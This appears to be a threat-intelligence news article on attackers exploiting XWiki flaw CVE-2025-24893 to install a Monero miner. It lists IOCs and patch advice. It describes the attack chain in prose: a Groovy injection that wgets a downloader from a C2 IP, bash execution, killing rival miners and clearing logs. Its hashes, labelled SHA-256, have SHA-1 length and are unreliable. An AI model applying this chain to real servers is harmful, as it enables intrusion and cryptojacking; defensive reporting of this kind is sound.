Critical XWiki Vulnerability Exploited to Deploy Cryptocurrency Miners
A critical remote code execution (RCE) vulnerability in XWiki, a widely used open-source wiki platform, has been actively exploited to deploy cryptocurrency mining malware on compromised servers. This flaw, identified as CVE-2025-24893, enables unauthenticated attackers to inject malicious templates and execute arbitrary code, effectively bypassing authentication mechanisms.
The exploitation of this vulnerability underscores the escalating threats to web applications, where real-world attacks often outpace official alerts from organizations like the Cybersecurity and Infrastructure Security Agency (CISA). VulnCheck, a vulnerability intelligence firm, reported observing this exploitation through their Canary network, which simulates vulnerable systems to detect attacks.
Unlike earlier reports that noted mere exploit attempts, VulnCheck’s findings reveal a sophisticated two-stage attack originating from an IP address in Vietnam. The vulnerability, added to VulnCheck’s Known Exploited Vulnerabilities (KEV) catalog in March 2025, involves template injection in XWiki’s SolrSearch endpoint, allowing attackers to run Groovy scripts for command execution. This absence from CISA’s KEV highlights how exploitation can surge before formal recognition, leaving organizations exposed.
The Two-Stage Exploitation Process
The attack unfolds in two phases, separated by at least 20 minutes, to evade detection.
1. Initial Request: Attackers send a URL-encoded GET request to the SolrSearch endpoint, injecting an asynchronous Groovy payload that uses `wget` to download a downloader script named `x640` from a command-and-control (C2) server at 193.32.208.24:8080. This script saves to `/tmp/11909` on the target system. The payload mimics legitimate browser traffic with a Firefox user agent to blend in.
2. Second Request: Approximately 20 minutes later, a second request executes the staged file by invoking `bash` on `/tmp/11909`. The downloader then fetches two additional scripts, `x521` and `x522`, piping them directly to `bash` for execution.
These scripts handle the payload delivery:
– x521: Creates directories in `/var/tmp`, downloads the coinminer binary `tcrond` from the same C2, and sets executable permissions.
– x522: Cleans the environment by terminating competing miners like `xmrig` and `kinsing`, clears history logs, and launches `tcrond` with a configuration pointing to `auto.c3pool.org` on port 80.
The miner, UPX-packed for obfuscation, uses a Monero wallet address for payouts, indicating a low-sophistication but persistent operation. All traffic traces back to 123.25.249.88, flagged in multiple AbuseIPDB reports for abusive activity.
Key Indicators
Defenders can use these indicators to hunt for similar activity across networks. The exploitation leverages `transfer.sh` for hosting payloads, a common tactic in cryptojacking campaigns.
– IP Addresses:
– 123.25.249.88 (Attacker, Vietnam)
– 193.32.208.24 (C2 Server)
– File Hashes (SHA-256):
– tcrond (packed): 0b907eee9a85d39f8f0d7c503cc1f84a71c4de10
– tcrond (unpacked): 90d274c7600fbdca5fe035250d0baff20889ec2b
– x521: de082aeb01d41dd81cfb79bc5bfa33453b0022ed
– x522: 2abd6f68a24b0a5df5809276016e6b85c77e5f7f
– x640: 5abc337dbc04fee7206956dad1e0b6d43921a868
– CVSS Score: 9.8 (Critical) – Unauthenticated RCE via template injection in XWiki versions prior to 15.10.6
– Affected Products: XWiki Enterprise, XWiki Standard; impacts web servers running vulnerable instances
Organizations using XWiki should patch immediately to version 15.10.6 or later, monitor for anomalous `wget` traffic, and scan for these indicators of compromise (IOCs). VulnCheck’s Canaries demonstrate the value of proactive threat intelligence in bridging gaps left by delayed official listings.
